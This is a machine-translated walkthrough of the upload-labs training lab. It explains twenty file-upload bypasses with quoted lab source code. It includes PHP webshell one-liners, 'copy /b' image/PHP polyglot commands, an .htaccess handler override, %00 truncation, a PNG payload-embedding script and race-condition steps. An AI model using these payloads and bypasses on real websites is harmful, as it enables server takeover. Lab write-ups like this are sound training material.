Pass-01 (JS verification)
Tip: This pass uses js to check illegal pictures on the client side
A pop-up window pops up to prompt here. It can be seen that this verification is carried out on the front end. As we all know, the front end is full of paper tigers, just disable it directly.
<form enctype="multipart/form-data" method="post" οnsubmit="return checkFile()">
From the form form, it can be seen that he is using the onsubmit function, which triggers the click event of the mouse.
The return checkFile function is called immediately after the form is submitted to check the uploaded file
Bypass method:
The first method: the first method creates a new html file, copies the source code of the page, and performs modification and deletion operations to disable the js script inside.
Add the submission address of the first level in the form form
The second method: directly press F12 to delete onsubmit directly
The second method is not recommended here, because if it is deleted directly in the browser viewer, it may still have some normal js,
If the normal js is deleted, the normal js may affect the upload operation
The third method: packet capture modification (not recommended)
Before uploading, just use a photo in the image format to upload, such as 1.png, use bp to intercept, and filename
Modify =1.png to 1.php and replace the content of the picture with a sentence code bypass
It is not recommended to use packet capture to modify data in front-end vulnerabilities. Because it is very likely that the data packet cannot be captured.
The reason why it can be captured here is because his code is a mixed code of php+html+js, and he has done a front-end and back-end interaction (submitting to the back-end) to capture the data package. If the page of the first level does not accept the php page, he can simply intercept the information of the website with only js and save it. If the entire uploading process to the parsing is written in js, it will not be able to catch it, because all operations of js are executed on the front end, and will not be sent to the back-end server, and there will be no interaction. Therefore, sometimes when accessing other websites, the data packets cannot be captured. It is very likely that the other party’s pages are not sent to the back-end server, and all of them are local-side codes (html, js).
Pass-02 (backend verification) file type verification (MIME verification)
Tip: This pass checks the MIME of the data packet on the server side!
It can be seen from the source code that only the file type (type) is verified, which must be image/jpeg or image/png or
The format of image/gif does not verify the suffix. You only need to use bp to capture the packet and modify the parameter of Content-Type: to
One of image/jpeg or image/png or image/gif, just bypass it
Popular science what is MIME
MIME: Multipurpose Internet Mail Extensions. The purpose is to judge the file type according to the file extension, and what application is used to open it, but here is to judge the extension according to the file type.
$_FILES['myfile']['type'] The MIME type of the file, which needs to be supported by the browser, such as "image/gif"
MIME gives the MIME information of the file, which can be used to send the correct information in the HTTP Content-type header, such as: header("Cotent-type:image/gif")
文件格式
编辑
播报
最早的HTTP协议中,并没有附加的数据类型信息,所有传送的数据都被客户程序解释为超文本标记语言HTML 文档,而为了支持多媒体数据类型,HTTP协议中就使用了附加在文档之前的MIME数据类型信息来标识数据类型。
MIME意为多功能Internet邮件扩展,它设计的最初目的是为了在发送电子邮件时附加多媒体数据,让邮件客户程序能根据其类型进行处理。然而当它被HTTP协议支持之后,它的意义就更为显著了。它使得HTTP传输的不仅是普通的文本,而变得丰富多彩。
每个MIME类型由两部分组成,前面是数据的大类别,例如声音audio、图象image等,后面定义具体的种类。
七种大类别:
video
image
application
text
audio
multipart
message
常见的MIME类型(通用型):
超文本标记语言文本 .html text/html
xml文档 .xml text/xml
XHTML文档 .xhtml application/xhtml+xml
普通文本 .txt text/plain
RTF文本 .rtf application/rtf
PDF文档 .pdf application/pdf
Microsoft Word文件 .word application/msword
PNG图像 .png image/png
GIF图形 .gif image/gif
JPEG图形 .jpeg,.jpg image/jpeg
au声音文件 .au audio/basic
MIDI音乐文件 mid,.midi audio/midi,audio/x-midi
RealAudio音乐文件 .ra, .ram audio/x-pn-realaudio
MPEG文件 .mpg,.mpeg video/mpeg
AVI文件 .avi video/x-msvideo
GZIP文件 .gz application/x-gzip
TAR文件 .tar application/x-tar
任意的二进制数据 application/octet-streamSteps:
Step 1: Start BP capture.
Step 2: Upload the php file and modify the Content-type
uploaded successfully
The following levels involve functions
Function analysis:
trim():去除左右两侧的空白
deldot():删除末尾的店
strrchar(string,char):函数查找串,在string字符串中查找,char在string字符串中最后一次出现的位置,返回并从该位置截取到尾,如果没有找到字符,则返回false
strrchar('hello wordld,i love you ','i')
输出结果: i love you
strtolower():函数 把所有字符串装换成小写
str_ireplace(fine,replace,strin):替换,
在strin字符串中,去搜索fine字符串,如果
搜到到匹配上了,用replace字符串进行替换Pass-03 (file extension verification, blacklist bypass)
Tip: This pass prohibits uploading .asp|.aspx|.php|.jsp suffix files!
View the original code
Analyze the code:
The method of array is used here, and the blacklist set does not allow the suffixes of .asp, aspx, php, and jsp to be uploaded.
Bypass ideas: php has been developed for so long, not only this one file name, we can use other php aliases to bypass: .php3 .php4 .php5 .phtml .phtm .phps .phpt .php345 (but here is There are prerequisites) that is, the configuration of the other party’s server has configured the parsing settings for these other php file names, denying that even if you upload it, the parsing still fails.
After configuring the corresponding analysis, just modify the file name directly. Change 1.php to the corresponding analysis file name you configured.
For example: 1.phtml after modification of 1.php
Pass-04 (file name suffix verification, configuration file analysis control)
hint:
This pass prohibits uploading .php|.php5|.php4|.php3|.php2|php1|.html|.htm|.phtml|.pHp|.pHp5|.pHp4|.pHp3|.pHp2|pHp1|.Html| .Htm|.pHtml|.jsp|.jspa|.jspx|.jsw|.jsv|.jspf|.jtml|.jSp|.jSpx|.jSpa|.jSw|.jSv|.jSpf|.jHtml|.asp |.aspx|.asa|.asax|.ascx|.ashx|.asmx|.cer|.aSp|.aSpx|.aSa|.aSax|.aScx|.aShx|.aSmx|.cEr|.sWf|. swf suffix file!
Take a look at the source code
It can be seen from the source code that a blacklist restriction is still used to verify the suffix of the file, and the restriction is more than before, but we can see from the blacklist that .htaccess is not verified, then We can use .htaccess to bypass
.htaccess function introduction: The htaccess file is a configuration file in the Apache server. This file can change all file configurations in this directory without obtaining root permissions. Then it means that as long as you create a .htaccess file, write in the php configuration, and upload it to the server, then the configuration of all the files in the directory where the .htaccess is located will be modified to be converted into the parsing format of php. (.htaccess files are only valid for Apache servers).
Steps:
1. First create a .htaccess file and write in the file
SetHandler application/x-httpd-phpSave it.
2. Upload this file to the server.
3. Change the one-word Trojan file name to one of the formats of gif/png/jpe. For example 2.png
4. Upload 1.gif (one sentence Trojan file) to the server
Upload was successful.
The key point here is the .htaccess file, which modifies the parsing method of all files in the directory to php,
So the picture 2.png "png" we uploaded for the second time is not in the blacklist, but because of the .htaccess file, it is parsed into php format, so normal parsing can be completed.
Pass-05 (file name suffix verification stitching bypass)
Tip: There is a php file in the upload directory (readme.php
View source code:
还是黑名单 验证:".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
Verified all .htaccess.
It can be seen that it is difficult to bypass this level, and it is also very complete for filtering
Bypass ideas:
$file_name = deldot($file_name);//Delete the dot at the end of the file name , the point is here. It can be seen from the code that one-time filtering is used for all filtering, and the point at the end is deleted here. Only once is deleted, then we can use
Point + space + point bypass, the function of deldot() is to delete the point at the end. When the point at the end is checked, it will delete it, and then continue to detect the point before, but this deldot function will stop when it encounters a space. Down, it is equivalent to terminating the operation when a space is encountered. So we just need to use dot + space + dot to bypass when uploading files, so that the files we are checking
It was originally 1.php. . , it became 1.php. , then 1.php . is not in the blacklist and can be bypassed successfully, and it also takes advantage of the characteristics of the system. When saving this file, the system also The dot at the end of 1.php. is automatically removed . Finally, the file saved on the computer becomes 1.php
Steps:
Step 1: Upload the php file of a one-sentence Trojan horse directly.
Step 2: Use bp to capture packets and modify data
Directly.+space+.
Step Three: Pack
Finish
Pass-06 (file name suffix verification, case bypass)
Check out the tips:
This pass prohibits uploading .php|.php5|.php4|.php3|.php2|php1|.html|.htm|.phtml|.pHp|.pHp5|.pHp4|.pHp3|.pHp2|pHp1|.Html| .Htm|.pHtml|.jsp|.jspa|.jspx|.jsw|.jsv|.jspf|.jtml|.jSp|.jSpx|.jSpa|.jSw|.jSv|.jSpf|.jHtml|.asp |.aspx|.asa|.asax|.ascx|.ashx|.asmx|.cer|.aSp|.aSpx|.aSa|.aSax|.aScx|.aShx|.aSmx|.cEr|.sWf|. swf|.htaccess suffix file!
view source code
Comparing it with the previous source code here, we can find that the strtolower() function is not used to convert the suffix to lowercase, then we can use uppercase and lowercase to bypass the blacklist.
Steps:
Step 1: Upload a .php file
Step 2: Turn on bp packet capture to modify data
Step Three: Pack
uploaded successfully
Pass-07 (file name suffix verification, space bypass)
Tip:
This pass prohibits uploading .php|.php5|.php4|.php3|.php2|php1|.html|.htm|.phtml|.pHp|.pHp5|.pHp4|.pHp3|.pHp2|pHp1|. Html|.Htm|.pHtml|.jsp|.jspa|.jspx|.jsw|.jsv|.jspf|.jtml|.jSp|.jSpx|.jSpa|.jSw|.jSv|.jSpf|.jHtml| .asp|.aspx|.asa|.asax|.ascx|.ashx|.asmx|.cer|.aSp|.aSpx|.aSa|.aSax|.aScx|.aShx|.aSmx|.cEr|.sWf |.swf suffix file!
view source code
It can be seen from the source code that trim() is not used to filter the blanks of the file name suffix. With the help of the characteristics of the windows system, the spaces in the file name will be treated as empty when the file is finally saved, and the latter will be removed when saving. Spaces are automatically removed.
However, when the code is checked in the program, the space is checked but the space cannot be automatically deleted. At the same time, it bypasses the verification of the blacklist
Manipulation steps:
Step 1: Upload a .php file
Step 2: Turn on bp packet capture to modify data, and add a space to the suffix of the file name
Step Three: Pack
uploaded successfully
Pass-08 (file name suffix name verification, dot bypass)
Tip: This pass prohibits uploading all analyzable suffixes!
view source code
The comparison found that deldot() was not used to filter the dot at the end, and the dot at the end was not deleted. Using the characteristics of windows again, a dot was added to the suffix of the file name, and the Windows system automatically removed the latter in the final saved file. Click to save the file. At the same time, the verification of the blacklist is bypassed.
Manipulation steps:
Step 1: Upload a .php file
Step 2: Turn on bp packet capture to modify data, add a dot to the suffix of the file name to bypass
Step Three: Pack
uploaded successfully
Pass-09 (file name suffix verification, ::$DATA bypass)
hint:
This pass prohibits uploading .php|.php5|.php4|.php3|.php2|php1|.html|.htm|.phtml|.pHp|.pHp5|.pHp4|.pHp3|.pHp2|pHp1|.Html| .Htm|.pHtml|.jsp|.jspa|.jspx|.jsw|.jsv|.jspf|.jtml|.jSp|.jSpx|.jSpa|.jSw|.jSv|.jSpf|.jHtml|.asp |.aspx|.asa|.asax|.ascx|.ashx|.asmx|.cer|.aSp|.aSpx|.aSa|.aSax|.aScx|.aShx|.aSmx|.cEr|.sWf|. swf|.htaccess suffix file!
view source code
Compared with the previous source code, it is found that str_ireplace() is not used to filter ::$DATA here, and it is not replaced with empty.
What is ::$DATA?
::$DATA This is a feature of the Windows operating system when processing files. It is a file stream. If there is this mark after the file name::$DATA
, and without filtering, windows will save the file directly without checking. The purpose of using him is not to check the suffix name.
So we just need to add ::$DATA after the file name to successfully bypass
Steps:
Step 1: Upload a .php file
Step 2: Turn on bp packet capture to modify data, add ::$DATA to the suffix of the file name to bypass
Step 3: Put the package to view the file
Delete the following ::$DATA to see the file just uploaded
uploaded successfully
Pass-10
The bypass method is the same as the fifth level, repeating
Pass-11 (file extension name verification, double writing bypass)
hint:
This pass will remove .php|.php5|.php4|.php3|.php2|php1|.html|.htm|.phtml|.pHp|.pHp5|.pHp4|.pHp3|.pHp2|pHp1 from the file name |.Html|.Htm|.pHtml|.jsp|.jspa|.jspx|.jsw|.jsv|.jspf|.jtml|.jSp|.jSpx|.jSpa|.jSw|.jSv|.jSpf|. jHtml|.asp|.aspx|.asa|.asax|.ascx|.ashx|.asmx|.cer|.aSp|.aSpx|.aSa|.aSax|.aScx|.aShx|.aSmx|.cEr| .sWf|.swf|.htaccess characters!
Check out the source code
The key point of this level is str_ireplace($deny_ext,"", $file_name); This function replaces the suffixes that appear in the blacklist in the file name with empty ones. If we upload a phpinfo.php and it is filtered, it will become phpinfo, there is no suffix and cannot be parsed, but she is also using one-time filtering this time. For example, if we upload phpinfo.phpphp, then the phpinfo.phpphp we originally uploaded after one-time filtering becomes phpinfo .php. The previous php was matched and replaced successfully, but the second php was not replaced with nothing.
Steps:
Step 1: Upload a .php file
Step 2: Turn on bp packet capture to modify data, and add php to the suffix of the file name to bypass.
Step 3: Packing
success
Pass-12 (file name suffix whitelist verification, GET type%00 truncated)
hint:
The upload path of this pass is controllable!
view source code
Analysis source code:
1.$ext_arr = array('jpg','png','gif'); Here, an array is used to make a whitelist
2.$file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
The suffix of the intercepted file name is intercepted from the position of the dot, and it is intercepted in a circular manner, not in a one-time manner
Validate ($_FILES['upload_file']['name']
3. if(in_array($file_ext,$ext_arr)){ Determine whether the suffix of the uploaded file name is in the white list, and if so, enter the loop.
4. $temp_file = $_FILES['upload_file']['tmp_name']; Enter the loop, put the uploaded file in a temporary directory, and generate a temporary file name
5. $img_path = $_GET['save_path']. "/".rand(10, 99).date("YmdHis").".".$file_ext; (this step is the key)
Use $_GET['save_path'] to accept a custom path, and randomly generate a file name from an array of 10, 99,
The suffix intercepted in front of $file_Ext on splicing.
6.(move_uploaded_file($temp_file,$img_path)){
Finally, move the previously saved $temp_file temporary file to $img_path
principle:
The 00 truncation uses the loopholes of php. The basis of php is implemented in C language. In C language, %00 is considered to be the end symbol, so it is based on the characteristics of c. In the version of PHP<5.3.4, it is in progress When the move_uploaded_file function is encountered when storing a file, this function reads a character with a hex value of 00, thinking that the reading is over, it terminates the subsequent operation, and 00 is truncated
Bypass ideas:
First of all, the white list is used. From the code, it can be seen that he first verified the suffix of the uploaded file name.
So we upload $_FILES['upload_file']['name'] in the first step, and the file name must be suffixed in the format of .jpg.png.gif. After bypassing the verification of the suffix name, enter the loop. Last but not least the file he saves is
$img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;, determined by the upload path, the original parameter $_GET[ ' save_path '], save_path=../upload/. Then the upload path is controllable. We use %00 to truncate and change the uploaded path to the file name. Finally, use the function move_uploade_file to play the function of %00 truncation.
If we hadn't used %00 to truncate the final uploaded file name might be
../upload/ 237298 .png
$_GET['save_path'] rand(10, 99).date("YmdHis") $file_ext;
After truncating with %00
../upload/1.php%00 237298 .png
$_GET['save_path'] rand(10, 99).date("YmdHis") $file_ext;
The final saved file becomes
../upload/1.php
Steps:
Step 1: Upload a .php file
Step 2: Open bp packet capture to modify data, filename="phpinfo.png" suffix is modified to image format,
Replace the contents of the file. Modify?save_path=../upload/1.php%00
Visit image address
Delete the following parameters, because what we finally save in the directory is 1.php
uploaded successfully
Note: To pass this level and the next one, you need to change php to a version <5.3.4, and turn off the magic_quotes_gpc option in php.ini.
Pass-13 (file name suffix whitelist verification, POST type%00 truncated)
Tip: The upload path of this pass is controllable!
There is nothing to say about this level. The principle is the same as the previous level, but it uses POST to pass parameters. So it needs to be encoded at %00.
GET will automatically decode %00
For example, if you enter a space in the url, he will judge by himself and encode him to know what you want %00, what is it doing in the url.
But adding %00 in POST POST will not be automatically decoded. The %00 you enter in POST will be regarded as %00 of ordinary text, then ordinary text will be encoded as %25%30%30. Not what we want %00, so we need to encode him first.
Steps:
Step 1: Upload a .php file
Step 2: Open bp packet capture to modify data, filename="phpinfo.png" suffix is modified to image format,
save_path"=../upload/1.php%00
Select %00 for encoding
Put the bag
uploaded successfully
Pass-14 (file content check, file header verification)
Tip: This pass checks the first 2 bytes of the icon content!
Take a look at the source code
function getReailFileType($filename){
$file = fopen($filename, "rb");
$bin = fread($file, 2); //只读2字节
fclose($file);
$strInfo = @unpack("C2chars", $bin);
$typeCode = intval($strInfo['chars1'].$strInfo['chars2']);
$fileType = '';
switch($typeCode){
case 255216:
$fileType = 'jpg';
break;
case 13780:
$fileType = 'png';
break;
case 7173:
$fileType = 'gif';
break;
default:
$fileType = 'unknown';
}
return $fileType;
}
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$temp_file = $_FILES['upload_file']['tmp_name'];
$file_type = getReailFileType($temp_file);
if($file_type == 'unknown'){
$msg = "文件未知,上传失败!";
}else{
$img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$file_type;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = "上传出错!";
}
}
}
Code analysis: This level verifies the content of the picture. This question gives a reminder that this level checks the header information of the file. By checking the first 2 bytes of the file and checking the binary header information of the uploaded file, the judgment is made The type of file. So modifying the suffix at this level is useless. Use picture code to bypass.
Steps:
1. Make a picture code Prepare a picture, and prepare a php file of a one-sentence Trojan horse
2. Open cmd and use the command to make a picture code
copy 1.jpg /b + 1.php /a shell.php3. Direct upload
Copy image link address
4. Click the address of "File Contains Vulnerabilities" to transfer parameters.
Pass-15-16 (file content check)
The bypass method is the same as the above question.
No matter how well the code is written and what function is used to filter, as long as the image code can be displayed normally in the browser, open it. Then you can use the file parsing vulnerability to bypass. (The premise is that there is this loophole. If there is no loophole, what format is parsed? The image format is to parse the image format, and the code format is to parse the code format. Don’t try to use the image to parse the effect of the code)
Pass-17 (file content inspection, image secondary rendering)
Tip: This pass re-renders the picture!
view source code
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])){
// 获得上传文件的基本信息,文件名,类型,大小,临时文件路径
$filename = $_FILES['upload_file']['name'];
$filetype = $_FILES['upload_file']['type'];
$tmpname = $_FILES['upload_file']['tmp_name'];
$target_path=UPLOAD_PATH.'/'.basename($filename);
// 获得上传文件的扩展名
$fileext= substr(strrchr($filename,"."),1);
//判断文件后缀与类型,合法才进行上传操作
if(($fileext == "jpg") && ($filetype=="image/jpeg")){
if(move_uploaded_file($tmpname,$target_path)){
//使用上传的图片生成新的图片
$im = imagecreatefromjpeg($target_path);
if($im == false){
$msg = "该文件不是jpg格式的图片!";
@unlink($target_path);
}else{
//给新图片指定文件名
srand(time());
$newfilename = strval(rand()).".jpg";
//显示二次渲染后的图片(使用用户上传图片生成的新图片)
$img_path = UPLOAD_PATH.'/'.$newfilename;
imagejpeg($im,$img_path);
@unlink($target_path);
$is_upload = true;
}
} else {
$msg = "上传出错!";
}
}else if(($fileext == "png") && ($filetype=="image/png")){
if(move_uploaded_file($tmpname,$target_path)){
//使用上传的图片生成新的图片
$im = imagecreatefrompng($target_path);
if($im == false){
$msg = "该文件不是png格式的图片!";
@unlink($target_path);
}else{
//给新图片指定文件名
srand(time());
$newfilename = strval(rand()).".png";
//显示二次渲染后的图片(使用用户上传图片生成的新图片)
$img_path = UPLOAD_PATH.'/'.$newfilename;
imagepng($im,$img_path);
@unlink($target_path);
$is_upload = true;
}
} else {
$msg = "上传出错!";
}
}else if(($fileext == "gif") && ($filetype=="image/gif")){
if(move_uploaded_file($tmpname,$target_path)){
//使用上传的图片生成新的图片
$im = imagecreatefromgif($target_path);
if($im == false){
$msg = "该文件不是gif格式的图片!";
@unlink($target_path);
}else{
//给新图片指定文件名
srand(time());
$newfilename = strval(rand()).".gif";
//显示二次渲染后的图片(使用用户上传图片生成的新图片)
$img_path = UPLOAD_PATH.'/'.$newfilename;
imagegif($im,$img_path);
@unlink($target_path);
$is_upload = true;
}
} else {
$msg = "上传出错!";
}
}else{
$msg = "只允许上传后缀为.jpg|.png|.gif的图片文件!";
}
}Code analysis:
This level is mainly to use the imagecreatefrom series of functions.
The main function of this function is to use the uploaded picture to generate a new picture, and the generated result will return a variable,
Return true on success, false on failure. And this function can separate our picture information from non-picture information when he recreates the picture, that is to say, if we add code to a picture, then he will upload it after you upload it. When this picture is created, the code in it is screened out and removed. In the end, only your picture information is kept and sorted and reconstructed.
The operation of the secondary rendering of the picture is carried out here in imagecreatefrom
Steps:
With the help of 010 Editor tool
GIF format bypass
Step 1: First use the GIF image and the code file to merge into one image using the command
copy 1.gif /b + 1.php /a blank.gif second step. Upload the merged file to the server
third step. Use the 010 Editor tool to open the synthesized GIF picture in the first step
And search for the pictures uploaded in the second step in the upload directory, and use the 010 Editor tool to open the pictures that have been rendered twice after uploading.
Step 4. Compare the two files,
Look for places where the blue parts are not permuted
Add a sentence of code to the 7907.gif image after the second rendering,
Save it.
Step 5: Cut the 7907.gif picture just saved from the upload directory to the directory where you want to upload the file.
Step 6: Re-upload the 7907.gif image to the server
Step 7: Click on the file containing the vulnerability url, and pass the parameters.
success
Bypass the PNG image.
I thought that the image structure of png and jpg is different from that of gif, and the profit is damaged. Here we need to use a script from Da Niu to complete it.
big cow script
<?php
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
0x66, 0x44, 0x50, 0x33);
$img = imagecreatetruecolor(32, 32);
for ($y = 0; $y < sizeof($p); $y += 3) {
$r = $p[$y];
$g = $p[$y+1];
$b = $p[$y+2];
$color = imagecolorallocate($img, $r, $g, $b);
imagesetpixel($img, round($y / 3), 0, $color);
}
imagepng($img,'./1.png');
?>
first step. A .php file will be created using Daniel's script
Step two. Prepare a picture in png format
third step. Enter cmd and use the php command to execute the php script
php beffpng.php hh.png Generate a new 1.png file picture
Step 4: Use 1.png to upload
Step 5: Copy the image address to the url that contains the loophole in the file and open it
Step 6: Pass a sentence of code in the Daniel script as a parameter <?$_GET[0]( $_POST[1]);?>
127.0.0.1/upload-labs/include.php?file=upload/126.png&0=assert
1=phpinfo();
Finish
jpg I really can't figure it out. I have been looking for a way all afternoon. Either the script or the picture can't get through.
Because my experiment didn't succeed, I won't post the tutorial, because the experiment didn't succeed and I'm not sure. You can search for scripts
or tutorials yourself.
Pass-18 (logic loopholes, conditional competition) secondary rendering
hint:
Code audit required!
View source code:
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$ext_arr = array('jpg','png','gif');
$file_name = $_FILES['upload_file']['name'];
$temp_file = $_FILES['upload_file']['tmp_name'];
$file_ext = substr($file_name,strrpos($file_name,".")+1);
$upload_file = UPLOAD_PATH . '/' . $file_name;
if(move_uploaded_file($temp_file, $upload_file)){
if(in_array($file_ext,$ext_arr)){
$img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
rename($upload_file, $img_path);
$is_upload = true;
}else{
$msg = "只允许上传.jpg|.png|.gif类型文件!";
unlink($upload_file);
}
}else{
$msg = '上传出错!';
}
}Code analysis:
$ext_arr = array('jpg','png','gif'); A whitelist is generated by using an array
$file_name = $_FILES['upload_file']['name']; accept files using super global variable
$temp_file = $_FILES['upload_file']['tmp_name']; Store the uploaded file in a temporary directory with a temporary name.
substr($file_name,strrpos($file_name,".")+1); Use a loop to intercept the position of . intercept file extension
$upload_file = UPLOAD_PATH . '/' . $file_name; Set the upload path
if(move_uploaded_file($temp_file, $upload_file)){ Move the file in the temporary storage path to $upload_file
under this path
if(in_array($file_ext,$ext_arr)){verify the file name suffix
$img_path = UPLOAD_PATH . '/'.rand(10, 99).date("YmdHis").".".$file_ext; If it is, set the path, and use random numbers and timestamps, and finally splice the suffix .
rename($upload_file, $img_path); Rename $upload_file to $img_path
This level is a logical loophole
Because the developer did not verify in the first step, the file is verified after uploading.
if(move_uploaded_file($temp_file, $upload_file)){. In this step, it can be seen that the file is not verified in the first step, and the file is directly moved to the server, so it means that before the verification, no matter what file you upload, it will be uploaded to the server up.
Bypass ideas:
We can use conditional competition to bypass it. When we upload this file, we continuously send packets to this server, use another browser to access the path of the uploaded file, and constantly call this file to occupy the resources of this file. Prevent his following code operation, then he will not perform a series of operations such as verification and filtering later, then the format of the file you upload is whatever format
What is a race condition?
This is a kind of technology, not a kind of vulnerability. It is equivalent to accessing the file immediately before the file proceeds to the next step.
Operate this file and occupy this file, so that subsequent operations cannot be performed.
For example: you open a text file now, write content and other operations in it, but do not close the process. Then you delete him when editing the content, and see if you can delete it.
What is secondary rendering?
I personally think that secondary rendering is a secondary operation. But the second rendering is not a loophole, but the technology he uses is called the second operation, but it does not mean that there is a loophole in the second rendering. The reason there is a loophole here is that the developer did not verify in the first step. If he did this verification in the first step, then this secondary rendering technique is fine
Steps:
The first step; as can be seen from the code, there is no verification of the file in the first step, then we directly upload a .php file
Step 2: Turn on BP packet capture, and set a variable to send packets to the server continuously.
Send to Intruder module
clear default variables
set to a variable
Set the number of packets sent to the server continuously
The third step; click Start attack to start sending packets
Step 4: Open another browser, access the path address of the picture, add the file name you uploaded, and keep refreshing to access
success.
Pass-19 (logic loopholes, conditional competition) secondary rendering
The bypass steps are the same as the previous level
Pass-20
hint:
The file name of this pass is obtained through $_POST.
View source code:
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");
$file_name = $_POST['save_name'];
$file_ext = pathinfo($file_name,PATHINFO_EXTENSION);
if(!in_array($file_ext,$deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH . '/' .$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
}else{
$msg = '上传出错!';
}
}else{
$msg = '禁止保存为该类型文件!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}Analysis code:
if (isset($_POST['submit'])) { Whether to receive the submission of submit
if (file_exists(UPLOAD_PATH)) { use file_exists to check if a file or directory (upload/) exists
$deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");
array blacklist
$file_name = $_POST['save_name']; accept post's save_name value=upload-19.jpg
$file_ext = pathinfo($file_name,PATHINFO_EXTENSION); use pathinfo function
Check file extension
if(!in_array($file_ext,$deny_ext)) { Determine whether the file name is in the blacklist
$temp_file = $_FILES['upload_file']['tmp_name']; If not, move the file to the temporary directory and give the temporary file name
$img_path = UPLOAD_PATH . '/' .$file_name; Use UPLOAD_PATH/splicing $file_name to form a new path
if (move_uploaded_file($temp_file, $img_path)) { Move the temporary file in the temporary directory to the new path.
Bypass ideas:
The first type (%00 truncated): As can be seen from the source code, the uploaded file is not filtered, but $_POST['save_name']; here is filtered save_name=upload-19.jpg. And finally saved The path is also
$_POST['save_name'] to determine. Then we just need to bypass the saved file name of the last save_name
Steps:
Step 1: Because the original file we uploaded has not been verified and filtered, then upload a .php file directly.
Step 2: Open BP to modify the data packet, and use %00 to truncate the value of sava_name
(The reason why it is not directly modified to .php here is because the source code uses the pathinfo function to verify the suffix. If it is directly modified to .php, it cannot pass the verification. Therefore, .jpg must be added after .php%00 Verify the suffix first, and when moving the directory at the end, because the function move_upload_fie is used to move and save the directory and file name, then the function move_upload_fie will terminate when it encounters %00, so move upload-19.php%00 .jpg, the last file saved to the server becomes upload-19.php)
Notice! ! Here is the %00 that uses the POST method to pass parameters, remember to encode! !
Step Three: Pack
Step Four: Access Files
success
The second bypass (folder name spoofing bypass)
Because he knows that he is verifying save_name
, then the value of save_name = upload-19.jpg
, then the splicing of his path should be
UPLOAD_PATH . '/' .$file_name;
upload/ upload-19.jpg
use
uplpad/ uplpad-19.php /. is bypassed,
thinking that when he is verifying, the format is php/. Then his original filter is php, which happens to be because we added this /. not in the blacklist to
bypass his verification, but the final file is saved At that time, the original uplpad/uplpad19.php/.
will be forcibly saved as upload/upload-19.php, and then it will become a php format.
success